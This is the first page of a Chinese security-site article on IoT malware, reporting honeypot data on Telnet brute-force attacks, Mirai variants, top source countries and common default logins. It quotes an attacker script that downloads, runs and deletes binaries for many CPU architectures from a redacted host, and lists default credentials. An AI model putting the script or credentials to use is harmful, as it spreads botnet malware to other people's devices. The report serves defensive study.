歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

IoT惡意軟件報告

來源:本站整理 作者:佚名 時間:2019-11-07 TAG: 我要投稿

自2008年以來,網絡犯罪分子一直在制造惡意軟件,以攻擊諸如路由器和其他類型的網絡IoT設備。 這些物聯網/嵌入式設備的主要問題在于,它們根本無法安裝任何類型的安全軟件。 我們該如何處理?
跟蹤攻擊,捕獲惡意軟件并獲得詳細數據的最佳選擇是使用蜜罐。
數據結果
到目前為止,研究人員已經在蜜罐環境中收集了超過一年的數據。 我們在全球范圍內部署了50多個蜜罐, 以下是根據匯總數據得出的結果。
Telnet
在2019年上半年,我們的Telnet蜜罐共檢測到超過1.05億次攻擊,這些攻擊源自276,000個IP地址。 相比之下,2018年檢測到的1200萬起攻擊(源于69000個IP地址),攻擊者IP地址的重復攻擊數量呈上升趨勢。
巴西和中國在IP地址方面一直處于領先地位,這些IP地址在2019年上半年成為Telnet密碼暴力破解的源頭,但與2018年相比,中國以30%居于領先地位 ,巴西以19%排名第二。 埃及,俄羅斯和美國分別排名第三,第四和第五。

前十位惡意軟件大多數位置都被各種Mirai所占據:


接下來的統計信息是從一組特定的蜜罐中收集的,這些蜜罐沒有受到基礎結構更改的影響(未添加新設備),因此統計信息僅依賴于受感染設備的活動。 會話代表成功的密碼暴力破解嘗試。

對來自一組孤立蜜罐的日志的分析表明,攻擊者IP地址同比呈穩定趨勢,但攻擊數量卻呈上升趨勢。 處于活動狀態的受感染設備數量仍然很高:成千上萬的設備試圖通過暴力破解密碼和利用各種漏洞來傳播惡意軟件。

Credentials
在IoT領域Telnet,SSH和Web服務器是最常見的可用服務,因此也是攻擊最多的服務。對于Telnet和SSH,不僅存儲惡意負載,而且還存儲初始登錄憑據。
收集了2018年第三季度和第四季度以及2019年第一季度至第三季度使用最廣泛的用戶名和密碼組合(見附錄)。到目前為止,最常見的組合是“ support / support”,其次是“ admin / admin”,“ default / default”和“ root / vizxv”。

惡意軟件
普通計算機通常在Intel或AMD CPU(低端x86或x86_64)上運行,而嵌入式IoT設備則使用由多家供應商提供的更廣泛的CPU體系結構。
下表列出了收集的所有樣本:

攻擊者一旦訪問設備,便使用一種普遍方法將其惡意軟件部署到所有體系結構中。 這種方法之所以有效,是因為只有一個二進制文件可以正確執行。以下是此類腳本的示例:
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/mips; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/x86; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/i686; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/i586; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/m68k; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/sparc; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/powerpc-440fp; chmod +x powerpc-440fp; ./powerpc-440fp; rm -rf powerpc-440fp

[1] [2]  下一頁

【聲明】:黑吧安全網(http://www.nkppsz.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        秒速时时彩骗局